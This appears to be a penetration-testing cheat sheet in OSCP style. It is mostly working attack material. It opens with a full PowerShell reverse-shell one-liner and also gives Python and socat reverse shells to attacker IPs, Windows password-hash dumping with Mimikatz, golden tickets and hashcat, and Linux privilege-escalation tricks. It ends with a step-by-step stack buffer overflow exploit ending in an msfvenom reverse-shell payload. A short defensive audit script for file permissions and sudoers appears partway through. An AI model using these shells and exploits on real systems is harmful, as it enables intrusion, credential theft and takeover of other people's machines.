powershell -nop -c "­$client = New-Object System.Ne­t.S­ock­ets.TC­PCl­ien­t('­192.16­8.1.2'­,44­44)­;$s­tream = $clien­t.G­etS­tre­am(­);[­byt­e[]­]$bytes = 0..655­35|­%{0­};w­hil­e(($i = $strea­m.R­ead­($b­ytes, 0, $bytes.Le­ngth)) -ne 0){;$data = (New-O­bject -TypeName System.Te­xt.A­SC­IIE­nco­din­g).G­et­Str­ing­($b­ytes,0, $i);$s­endback = (iex $data 2>&1 | Out-String );$sen­dback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sen­dbyte = ([text.en­cod­ing­]::­ASC­II).Ge­tBy­tes­($s­end­bac­k2)­;$s­tre­am.W­ri­te(­$se­ndb­yte­,0,­$se­ndb­yte.Le­ngt­h);­$st­rea­m.F­lus­h()­};$­cli­ent.Cl­ose­()"
Windows intera­ctive shell (ASPX Shell by LT)
Dumping passwords and hashes on windows
This most probably requires admini­str­ative permis­sions. Windows stores passwords in SAM - Security Account Manager. Passwords are stored differ­ently depending on the operating system.
There are 2 Authen­tic­ation mechanism that produce 2 Hashes - LM LAN Manager (LM) and NT LAN Manager (NTLM) > VISTA.
Credential Dumping: SAM (tools)
The Security Accounts Manager (SAM) is a registry file in Windows NT and later versions until the most recent Windows 8. It stores users’ passwords in a hashed format (in LM hash and NTLM hash). Since a hash function is one-way, this provides some measure of security for the storage of the passwords.
SAM is found in C:\Windows\System32\config, and the hashed passwords saved in SAM can be found in the registry: just open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SAM.
Windows 7 - SamDump2, PwDump7, Metasploit framework
Windows 10 - Mimikatz, Impacket, Metasploit Framework - Hashdump and load_kiwi (mimikatz)
The Registry is essentially a database. Its information is stored on disk for the most part, though dynamic information also exists in the computer’s memory.

Windows Priv. Esc. || Metasploit Module

Microsoft Remote Desktop (MSRDP)
Port no - 3389
Local Security Authority Subsystem Service
lsass service
The service responsible for authentication within Windows.
We generally use the migrate command in Metasploit to move into a process that can communicate with lsass.exe and has the permissions needed to interact with it.
To exploit lsass we need: same architecture (living in), same permissions.
In order to interact with lsass we need to be 'living in' a process that is the same architecture as the lsass service (x64 in the case of this machine) and a process that has the same permissions as lsass.
Printer service
The printer spool service
Living in as a process
Often when we take over a running program we ultimately load another shared library into the program (a dll) which includes our malicious code. From this, we can spawn a new thread that hosts our shell.
msfconsole >> search <Program/Process>
Fire up the msfconsole terminal and search for an exploit for a vulnerable program or process
Select an exploit
Select using #use <no>. Remember to use the #search options command and set them accordingly
Fire the exploit
#run them after setting up options
Metasploit command center
#getuid (user-id) #sysinfo #getprivs #migrate -N PROCESS_NAME
Local_exploit V/S Remote_exploit
A remote exploit works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A local exploit requires prior access to the vulnerable system and usually increases the privileges of the person running the exploit past those granted by the system administrator.
Local_exploit (metasploit)
run post/multi/recon/local_exploit_suggester
Results for potential escalation exploits.
Local exploits require a session to be selected
Background a session (some privilege)
This provides us with a session number which can be used in combination with another exploit to escalate privileges
Mimikatz (password dumping tool)
#load kiwi (Kiwi is the updated version of Mimikatz)
This expands the options; use #help to view them
Mimikatz allows us to create what's called a golden ticket, allowing us to authenticate anywhere with ease.
Golden ticket attacks are a function within Mimikatz which abuses a component of Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain.
Windows NTLM hash crack
hashcat -a 0 -m 1000 crack.hash /usr/share/wordlists/rockyou.txt

Privilege escalation

Fast Linux Priv. Esc Checklist
uname -a
id
sudo -l
/etc/crontab
suid
linpeas
linux-exploit-suggester
pspy
netstat
capabilities
search dir for juice
use ps -aux | grep root to look at any services that are running as root.
Password Spray
Config files of a running service might leak creds
C program
make <.c program> then ./ to execute
SCP (secure copy files) from local to remote machine
scp <filename> username@ip:<location>
Python server
python3 -m http.server
Unix info about your specific Linux distribution
lsb_release -a
uname -a
Use echo " text " into file
echo "text" > output.txt
Python reverse shell with newline char
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
View Cronjobs
cat /etc/crontab
Exploiting sudo -l user NOPASSWD: ALL
sudo -i -u <user>
Sudo knowledge
su asks for the password of the user "root".
sudo asks for your own password (and also checks if you're allowed to run commands as root, which is configured through /etc/sudoers -- by default all user accounts that belong to the "admin" or "sudo" groups are allowed to use sudo).
sudo -s launches a shell as root, but doesn't change your working directory. sudo -i simulates a login into the root account: your working directory will be /root, and root's .profile etc. will be sourced as if on login.
Sudo -l (exploiting sudo rights)
After SSH
The id command in Linux is used to find out user and group names and numeric IDs (UID or group ID) of the current user or any other user on the server
id shows 108(lxd)
Weak File Permission
ls -l <file> : Check Permissions
Readable /etc/shadow
Crack the passwd, SHA-512
Writeable /etc/shadow
Create and replace the passwd, mkpasswd -m sha-512 newpasswordhere
Writeable /etc/passwd
Create and replace the passwd, openssl passwd newpasswordhere
Means that the user can run something as root
Check SUID and sudo -l. Refer to checklist.
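The three conditions listed under Weak File Permission, together with the NOPASSWD: ALL sudo rule noted earlier, can be checked from the administrator's side before anyone else finds them. This is an added example, not part of the original cheat sheet; the function names and the permission baseline (shadow not readable by others, passwd not writable by group or other) are assumptions.

```python
import os
import re
import stat

# Assumed baseline: /etc/shadow is neither readable nor writable by "other"
# (nor group-writable); /etc/passwd is not writable by group or other.
FORBIDDEN_BITS = {
    "shadow": stat.S_IROTH | stat.S_IWOTH | stat.S_IWGRP,
    "passwd": stat.S_IWOTH | stat.S_IWGRP,
}

# Matches e.g. "alice ALL=(ALL) NOPASSWD: ALL"; skips comments and
# rules limited to specific commands or aliases.
NOPASSWD_ALL = re.compile(r"^\s*(?P<who>[^#\s]\S*)\s+\S+\s*=.*NOPASSWD:\s*ALL\b")


def audit_mode(path, kind):
    """Return findings for one account database file (kind: shadow|passwd)."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    bad = mode & FORBIDDEN_BITS[kind]
    findings = []
    if bad & stat.S_IROTH:
        findings.append(f"{path}: readable by everyone ({oct(mode)})")
    if bad & (stat.S_IWOTH | stat.S_IWGRP):
        findings.append(f"{path}: writable by group/other ({oct(mode)})")
    return findings


def audit_sudoers(text):
    """Return users/groups that sudoers text grants NOPASSWD: ALL."""
    hits = []
    for line in text.splitlines():
        match = NOPASSWD_ALL.match(line)
        if match:
            hits.append(match.group("who"))
    return hits


if __name__ == "__main__":
    for path, kind in (("/etc/shadow", "shadow"), ("/etc/passwd", "passwd")):
        for finding in audit_mode(path, kind):
            print(finding)
    try:
        with open("/etc/sudoers") as fh:
            for who in audit_sudoers(fh.read()):
                print(f"/etc/sudoers: {who} has NOPASSWD: ALL")
    except PermissionError:
        print("/etc/sudoers: not readable by this user (expected)")
```

Any finding on /etc/shadow or /etc/passwd should be corrected with chmod and chown back to the distribution default, and a NOPASSWD: ALL entry narrowed to the specific commands the account needs.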
Socat (more powerful version of nc)
We can use socat to send ourselves a root shell.
Attacking machine: socat file:`tty`,raw,echo=0 tcp-listen:1234
Remote machine: sudo socat tcp-connect:<your-ip-address>:1234 exec:bash,pty,stderr,setsid,sigint,sane
Socat Reverse shell as root
Reverse shell (one-liners)
Linux Privilege Escalation Checklist
Linux Priv Esc
Kernel exploits : uname -a
Execute command as root : sudo -l
Find binary we can execute as root : SUID
Check cronjobs, monitor Linux system : PSPY64
Few things to remember
If root is executing a file and we can access that file, then we can get a reverse shell. Mostly cron jobs can be exploited like this. Or, if you can execute the file as root but can't write to it, then delete it and execute to get a reverse shell.
Linux Priv Esc via Capability (getcap)
To identify if it exists, type getcap -r / 2>/dev/null

Buffer Overflows (OSCP procedure)

References 💀
1. SPIKING | Testing commands to find vulnerable
💀 We are trying to test multiple commands and find what's vulnerable.
For example, for the TRUN function
└─# cat spike.spk
s_string("TRUN ");
Attacking Machine
nc -nv 9999
generic_send_tcp 9999 spike.spk 0 0
Look out for a buffer overflow in the registers
2. FUZZING | Crash The Application
💀 We will now go ahead and attack that command specifically. In FUZZING, when the registers crash and we see TRUN being affected,
we stop the exploit with ctrl+c and get an estimate of at what bytes TRUN was affected
E.g. if it's 2800 bytes -> we can round off and make it 3000
import sys, socket
from time import sleep
buffer = 'A' * 100
while True:
    s.send(('TRUN /.:/' + buffer))
    buffer = buffer + 'A'
print("Fuzzing crashed at %s bytes" % str(len(buffer)))
Goal : To know approximately where we crashed, at what bytes
Once it breaks, print out an exception: Fuzzing crashed at X bytes
Now we will find where the EIP is, using a tool
💀 First we will use the pattern_create msf tool to create 3000 bytes, then run the exploit. After that we will use pattern_offset, specifying the value of EIP (which will be within those 3000 bytes), to grab the offset
Tool : Pattern Create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

#!/usr/bin/python
import sys, socket
offset = (' ')
s.send(('TRUN /.:/' + offset))
print("Error Connecting to the Server")

Tool : Pattern Offset
pattern_offset.rb -l 3000 -q <VALUE/FINDING> from EIP
Goal: This offset information is critical because now we know at which byte we can control the EIP. We will overwrite it with specific bytes
💀 We discovered that the offset is at 2003 bytes.
It means there are 2003 bytes right before EIP begins
import sys, socket
shellcode = 'A' * 2003 + 'B' * 4
s.send(('TRUN /.:/' + shellcode))
print("Error Connecting to the Server")
Goal : Control this EIP now
TRUN got filled with a bunch of As
EBP, bottom is filled with 41414141
EIP, return is filled with 42424242
Now, we only sent bytes of Bs and they all landed up in EIP
5. FINDING THE BAD CHARACTERS in HexDump, Note them & x00 is a bad char
Manually Identify Bad Chars
After running the script, EIP will be same 4242 but we will work on Hexdump to find bad guys.
Sequence Flow : 1-9 -> a-f -> 10-19 -> 1a-1f -> 20-29 -> 2a-2f
Add string with badchar + "blacklist" to identify End of Buffer
import sys, socket
badchar = ("\x01\xff") #all bad char will be sent
shellcode = 'A' * 2003 + 'B' * 4 + badchar
s.send(('TRUN /.:/' + shellcode))
print("Error Connecting to the Server")
01 - 09    20 - 29    40 - 49    60 - 69    80 - 89
0a - 0f      2a - 2f    4a - 4f      6a - 6f    8a - 8f
10 - 19    30 - 39    50 - 59    70 - 79    90 - 99
1a - 1f      3a - 3f    5a - 5f      7a - 7f    9a - 9f
a0 - a9    c0 - c9    e0 - e9
aa - af      ca - cf    ea - ef
b0 - b9    d0 - d9    f0 - f9
ba - bf      da - df    fa - ff
Goto HexDump, by Right click ESP (top) in register > Follow Dump > Ok
We will go through this whole list
We see if there is anything out of place now
We got 01 02 03 ..B0.. ..B0.. B6 B7 B8. We have B4 and B5 Missing -> Those are Bad Characters
This is EYE TEST, We Need to make sure we find everyt­hing, which is out of place
💀 Goal : To find a JMP ESP that we will use to tell the application to execute our code.
mona modules > Select all with False, means no memory protection in this module
!mona modules

nasm_shell -> JMP ESP

!mona find -s "\xff\xe4" -m essfunc.dll

rclick on panel > search for the return address we found
It will have JMP ESP & FFE4 location
F2 > Put a break point
import sys, socket
shellcode = 'A' * 2003 + '\xaf\x11\x50\x62'
s.send(('TRUN /.:/' + shellcode))
print("Error Connecting to the Server")
💀 Finally, we were able to provide EIP a valid return address, JMP ESP, where it can point to in memory
Ran our script with that Pointer address, affecting directly EIP area
Changed EIP return address - DONE!
💀 Our EIP will point to the JMP ESP, which will run our malicious shellcode and give us root (hopefully).
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"
import sys, socket
overflow = ("Inside this malicious shellcode")
shellcode = 'A' * 2003 + '\xaf\x11\x50\x62' + '\x90' * 32 + overflow
s.send(('TRUN /.:/' + shellcode))
print("Error Connecting to the Server")
💀 Shellcode needs 4 things
1. The exact number of bytes to crash (Crash Point)
2. The value of the JMP ESP that will instruct the applic­ation to execute our code (Return Address)
3. Padding (No-op)
4. shellcode to grab reverse shell
8. ROOT | Exploit
Check real-time protection is off & Antivirus while playing with this method
\x41, \x42, \x43 - The hexadecimal values for A, B and C.
Anatomy of Stack : EBEE
ESP (Extended Stack Pointer) : It's at the TOP
Buffer Space : Fills and goes downward, should stop before EBP & EIP
EBP (Extended Base Pointer) : It's at the BOTTOM
EIP (Extended Instruction Pointer) : It's the Return Address
The Extended Stack Pointer (ESP) is a register that lets you know where on the stack you are and allows you to push data in and out of the application.
It's the Return Address, and we can use this address to point to directions. It can be malicious code to gain a reverse shell
The Extended Instruction Pointer (EIP) is a register that contains the address of the next instruction for the program or command.
The Jump (JMP) is an instruction that modifies the flow of execution where the operand you designate will contain the address being jumped to.
1 Spiking : Method to find the vulnerable part of the program
2 Fuzzing : We will send a bunch of characters to the program to check if it breaks it
3 Finding the Offset : If we break it, we want to find out the point at which we break it
4 Overwriting the EIP : We will use that offset to override the EIP, that pointer address can be controlled
+ EIP controlled, 2
* 5 Finding Bad Character
* 6 Finding the Right Module
7 Generating Shellcode
+ Root